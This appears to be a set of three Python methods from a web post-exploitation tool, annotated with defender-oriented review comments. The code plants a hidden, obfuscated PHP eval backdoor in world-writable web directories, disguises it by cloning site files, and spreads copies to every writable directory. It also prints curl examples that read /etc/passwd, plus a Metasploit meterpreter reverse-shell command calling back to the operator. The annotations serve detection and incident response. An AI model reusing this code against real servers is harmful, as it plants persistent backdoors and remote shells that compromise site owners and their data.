示例#1
    def php(self, ip, ourIP):
        """Plant a hidden PHP eval backdoor in a world-writable web directory.

        Review summary, written for defenders reading this listing:

        * Every command string is handed to ``make_request.get_page_source``,
          which presumably runs it on the remote host through an already
          present shell and returns the output as a sequence of lines
          (the helper is not shown here -- confirm).
        * Target selection: the first world-writable directory (``-perm -0002``)
          under the document root, taken from a shuffled ``find`` listing.
        * Artifact: a dotfile named ``.<8 letters/digits>.php``, optionally
          seeded with a copy of an existing site file, with a one-line
          ``<?php eval(base64_decode("..."))`` stub appended. The keywords are
          written in random upper/lower case.
        * The stub evaluates the value of a random six-letter GET parameter.

        What to look for: hidden ``.php`` dotfiles inside writable directories
        of the docroot, mixed-case ``eval(base64_decode(`` in PHP sources, the
        web-server account running ``find ... -perm -0002``, and requests that
        carry PHP code in a short query parameter. Removing world-writable
        directories from the docroot and disabling script execution in
        upload/cache directories takes away the precondition this relies on.

        ``ip`` is not referenced in the body; ``ourIP`` is only interpolated
        into the printed usage text.
        """
        wwwroot = linux.get_doc_root()
        # World-writable directories only; `sort -R` shuffles them so the pick
        # below differs between runs.
        cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
        folder = make_request.get_page_source(cmd)
        if folder:
            folder = folder[0]
            # NOTE(review): '{1}' is formatted with a single positional
            # argument here and again for the filename message below, which
            # raises IndexError; as listed, execution stops at this line.
            cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
            # Leading '.' hides the file from a plain `ls`; the random name
            # means a fixed filename signature will not match it.
            filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
            cprint('[+] Filename: \'{1}\''.format(filename), 'green')
            location = '{0}/{1}'.format(folder, filename)

            # List every regular file under the docroot so the operator can
            # choose one to copy as the base of the new file.
            cmd = 'find {0} -type f -print'.format(wwwroot)
            files = make_request.get_page_source(cmd)
            cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
            cprint(' 0.) Don\'t close - create new', 'green')
            path = []
            c = 0
            for file in files:
                path.append(file)
                c += 1
                cprint('{0:2d}.) {1}'.format(c, file), 'green')
            # Re-prompt until an integer in [0, c] is entered; non-numeric
            # input is silently ignored.
            while True:
                try:
                    clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
                    if 0 <= clone <= c:
                        break
                except ValueError:
                    pass

            if clone != 0:
                # The menu is 1-based, `path` is 0-based. Copying a legitimate
                # file first makes the result resemble site content, so review
                # the tail of a suspect file, not only its first lines.
                cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
                make_request.get_page_source(cmd)
            cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
            parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
            # Random per-character casing of the keywords: content signatures
            # for this pattern need to be case-insensitive.
            casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
            caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
            payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
            # The trailing .format(payload) has no effect: base64 output
            # contains no '{' or '}' replacement fields.
            payloadEncoded = b64encode(payload).format(payload)
            evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
            # `>>` appends, so content copied in by the cp above is kept and
            # the stub lands at the end of the file.
            cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
            make_request.get_page_source(cmd)
            cprint('[+] Done!', 'blue')
            # Path of the chosen directory relative to the document root.
            uri = folder[len(wwwroot):]

            #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
            #'https://localhost'
            url = '/'.join(getargs.url.split('/', 3)[:3])
            # Usage text printed for the operator. The request shapes it shows
            # (PHP function calls in a query-string value) are what access-log
            # and WAF rules can key on.
            example = """Example:
            curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
            curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
            curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
            msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
                    url=url,
                    uri=uri,
                    filename=filename,
                    parameter=parameter,
                    ourIP=ourIP,)
            cprint(example, 'green')
        else:
            cprint('\n[!] Unable to find a writable directory', 'red')
示例#2
 def writable(self):
     """List world-writable directories under the document root.

     Builds a ``find`` for directories with the other-write bit set
     (``-perm -0002``), passes it to ``make_request.get_page_source``
     (presumably executed on the remote host -- helper not shown, confirm)
     and prints the results as a numbered list.

     The same ``find`` expression works as a hardening audit: any directory
     it reports inside a docroot is a place where an unprivileged process
     can drop files that the web server will serve.
     """
     cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root())
     # NOTE(review): this assigns to the instance attribute `writable`, which
     # has the same name as this method; after the first call the attribute
     # hides the method on this instance, so a second `obj.writable()` would
     # try to call the stored result instead.
     self.writable = make_request.get_page_source(cmd)
     if self.writable:
         # Numbering is 1-based.
         c = 1
         for path in self.writable:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
     else:
         cprint('\n[!] Didn\'t find any wriable directories', 'red')
示例#3
 def spread(self):
     """Copy the current shell file into every world-writable docroot directory.

     The command pipes the ``find ... -perm -0002 -type d`` listing into
     ``xargs -n 1 cp -v <shell_name>``, so one ``cp`` runs per directory and
     the same file is written to each of them. ``done`` is whatever
     ``make_request.get_page_source`` returns for that command (presumably
     the ``cp -v`` output lines -- helper not shown, confirm).

     Incident-response implication: finding and deleting one copy is not
     enough. Identical files (same name, size and hash) appearing at the same
     time across many writable directories are the trace this leaves, and
     cleanup has to sweep every writable directory under the docroot.
     """
     # The prompt is shown unconditionally, even when the answer is discarded
     # by the 'post' branch on the next line.
     provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green'))
     # For method == 'post' the name is the last path segment of the target
     # URL; otherwise the operator-supplied name is used.
     shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name
     cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name)
     done = make_request.get_page_source(cmd)
     if done:
         # NOTE(review): the template names {end} and {hot}, but only
         # shell_name and writable_length are supplied, so this format call
         # raises KeyError as listed.
         success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format(
                 shell_name=shell_name,
                 writable_length=len(done))
         success += '\n[+] To check these paths type @enum writable'
         cprint(success, 'blue')
     else:
         cprint('\n[!] Something went wrong while spreading shell', 'red')